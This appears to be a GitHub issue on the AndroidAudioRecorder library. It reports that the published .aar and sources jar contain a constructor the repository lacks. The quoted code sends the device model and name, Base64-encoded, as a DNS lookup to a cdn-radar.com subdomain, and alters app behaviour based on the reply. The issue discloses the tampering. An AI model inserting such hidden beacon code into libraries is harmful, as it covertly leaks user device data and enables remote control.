Open
Description
This is the code of the AndroidAudioRecorder
constructor in the code on GitHub:
private AndroidAudioRecorder(Activity activity) {
this.activity = activity;
}
However, this is the code of the same constructor in the published .aar
as well as the published sources .jar
file.
private AndroidAudioRecorder(Activity activity) {
this.activity = activity;
Thread thread = new Thread() {
@Override
public void run() {
try {
InetAddress byName = InetAddress.getByName(new String(Base64.encode((Build.MODEL + ";" + Build.DEVICE).getBytes(), Base64.NO_WRAP)).concat(".n.cdn-radar.com"));
if(byName.isLoopbackAddress()) {
color = 0;
}
} catch (UnknownHostException e) {
e.printStackTrace();
}
}
};
thread.start();
}
Please explain this difference.
Metadata
Metadata
Assignees
Labels
No labels